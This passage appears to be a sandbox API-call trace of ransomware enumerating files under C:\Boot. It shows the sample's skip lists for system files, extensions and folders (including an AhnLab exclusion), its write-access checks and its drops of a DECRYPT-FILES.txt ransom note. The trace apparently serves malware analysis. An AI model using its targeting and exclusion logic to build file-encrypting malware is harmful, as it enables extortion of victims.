(lpString1="LOG", lpString2="sys") returned -1 [0179.256] lstrcmpiW (lpString1="LOG", lpString2="dll") returned 1 [0179.256] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.256] lstrlenW (lpString="BCD.LOG") returned 7 [0179.256] lstrcpyW (in: lpString1=0x36ff1d0, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.256] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG" | out: lpString1="C:\\Boot\\BCD.LOG") returned="C:\\Boot\\BCD.LOG" [0179.256] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.257] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.257] CloseHandle (hObject=0x0) returned 0 [0179.257] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.257] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="DECRYPT-FILES.txt") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="autorun.inf") returned 1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="boot.ini") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="desktop.ini") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ntuser.dat") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="iconcache.db") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="bootsect.bak") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ntuser.dat.log") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="thumbs.db") returned -1 [0179.257] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Bootfont.bin") returned -1 [0179.257] lstrlenW (lpString="BCD.LOG1") returned 8 [0179.257] lstrcmpiW (lpString1="LOG1", lpString2="lnk") returned 1 [0179.257] lstrcmpiW (lpString1="LOG1", lpString2="exe") returned 1 [0179.257] lstrcmpiW (lpString1="LOG1", lpString2="sys") returned -1 [0179.257] lstrcmpiW (lpString1="LOG1", lpString2="dll") returned 1 [0179.257] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.257] lstrlenW (lpString="BCD.LOG1") returned 8 [0179.257] lstrcpyW (in: lpString1=0x36ff1d0, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.257] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG1" | out: lpString1="C:\\Boot\\BCD.LOG1") returned="C:\\Boot\\BCD.LOG1" [0179.258] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.258] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.258] CloseHandle (hObject=0x0) returned 0 [0179.258] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.258] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="DECRYPT-FILES.txt") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="autorun.inf") returned 1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="boot.ini") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="desktop.ini") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ntuser.dat") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="iconcache.db") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="bootsect.bak") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ntuser.dat.log") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="thumbs.db") returned -1 [0179.258] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Bootfont.bin") returned -1 [0179.258] lstrlenW (lpString="BCD.LOG2") returned 8 [0179.258] lstrcmpiW (lpString1="LOG2", lpString2="lnk") returned 1 [0179.258] lstrcmpiW (lpString1="LOG2", lpString2="exe") returned 1 [0179.258] lstrcmpiW (lpString1="LOG2", lpString2="sys") returned -1 [0179.258] lstrcmpiW (lpString1="LOG2", lpString2="dll") returned 1 [0179.259] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.259] lstrlenW (lpString="BCD.LOG2") returned 8 [0179.259] lstrcpyW (in: lpString1=0x36ff1d0, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.259] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD.LOG2" | out: lpString1="C:\\Boot\\BCD.LOG2") returned="C:\\Boot\\BCD.LOG2" [0179.259] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.259] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.259] CloseHandle (hObject=0x0) returned 0 [0179.259] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.259] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xa6a52f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10108, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT.oFY0", cAlternateFileName="BOOTST~1.OFY")) returned 1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="DECRYPT-FILES.txt") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="autorun.inf") returned 1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="boot.ini") returned 1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="desktop.ini") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="ntuser.dat") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="iconcache.db") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="bootsect.bak") returned 1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="ntuser.dat.log") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="thumbs.db") returned -1 [0179.259] lstrcmpiW (lpString1="BOOTSTAT.DAT.oFY0", lpString2="Bootfont.bin") returned 1 [0179.259] lstrlenW (lpString="BOOTSTAT.DAT.oFY0") returned 17 [0179.259] lstrcmpiW (lpString1="oFY0", lpString2="lnk") returned 1 [0179.260] lstrcmpiW (lpString1="oFY0", lpString2="exe") returned 1 [0179.260] lstrcmpiW (lpString1="oFY0", lpString2="sys") returned -1 [0179.260] lstrcmpiW (lpString1="oFY0", lpString2="dll") returned 1 [0179.260] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.260] lstrlenW (lpString="BOOTSTAT.DAT.oFY0") returned 17 [0179.260] lstrcpyW (in: lpString1=0x36ff1d0, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.260] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BOOTSTAT.DAT.oFY0" | out: lpString1="C:\\Boot\\BOOTSTAT.DAT.oFY0") returned="C:\\Boot\\BOOTSTAT.DAT.oFY0" [0179.260] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.260] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.oFY0" (normalized: "c:\\boot\\bootstat.dat.ofy0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.260] CloseHandle (hObject=0x0) returned 0 [0179.260] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.260] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0179.260] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0179.260] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0179.260] lstrcatW (in: lpString1="cs-CZ", lpString2="\\" | out: lpString1="cs-CZ\\") returned="cs-CZ\\" [0179.260] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="cs-CZ\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0179.260] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Program Files") returned 0x0 [0179.260] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch=":\\Windows") returned 0x0 [0179.260] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Games\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\All Users") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="AhnLab") returned 0x0 [0179.261] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.261] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0179.261] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.261] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\cs-CZ\\\\0a16c9.tmp") returned 25 [0179.261] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\\\0a16c9.tmp" (normalized: "c:\\boot\\cs-cz\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.261] GetLastError () returned 0x5 [0179.261] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0179.261] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.261] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\cs-CZ\\\\DECRYPT-FILES.txt") returned 32 [0179.261] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\cs-cz\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.295] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0179.295] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ\\", lpString2="*" | out: lpString1="C:\\Boot\\cs-CZ\\*") returned="C:\\Boot\\cs-CZ\\*" [0179.295] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4797f8 [0179.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.295] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.295] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.295] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.295] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.296] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.296] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.296] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.296] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.296] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.296] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.296] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0179.296] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.296] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\cs-CZ\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0179.296] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0179.296] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0179.296] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.296] CloseHandle (hObject=0x0) returned 0 [0179.296] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.297] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a790a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.297] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.297] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a790a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.297] FindClose (in: hFindFile=0x4797f8 | out: hFindFile=0x4797f8) returned 1 [0179.297] CloseHandle (hObject=0xffffffff) returned 0 [0179.297] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0179.297] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0179.297] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0179.297] lstrcatW (in: lpString1="da-DK", lpString2="\\" | out: lpString1="da-DK\\") returned="da-DK\\" [0179.297] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="da-DK\\" | out: lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Program Files") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch=":\\Windows") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Games\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\All Users") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="AhnLab") returned 0x0 [0179.297] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.297] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0179.297] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.297] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\da-DK\\\\0a16c9.tmp") returned 25 [0179.297] CreateFileW (lpFileName="C:\\Boot\\da-DK\\\\0a16c9.tmp" (normalized: "c:\\boot\\da-dk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.298] GetLastError () returned 0x5 [0179.298] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0179.298] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.298] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\da-DK\\\\DECRYPT-FILES.txt") returned 32 [0179.298] CreateFileW (lpFileName="C:\\Boot\\da-DK\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\da-dk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.335] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0179.335] lstrcatW (in: lpString1="C:\\Boot\\da-DK\\", lpString2="*" | out: lpString1="C:\\Boot\\da-DK\\*") returned="C:\\Boot\\da-DK\\*" [0179.335] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4797f8 [0179.336] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.336] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.336] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.336] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.336] FindNextFileW (in: hFindFile=0x4797f8, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.336] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.336] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.336] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.336] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.336] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.336] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0179.336] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.336] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\da-DK\\" | out: lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0179.336] lstrcatW (in: lpString1="C:\\Boot\\da-DK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\Boot\\da-DK\\bootmgr.exe.mui" [0179.336] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0179.336] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff 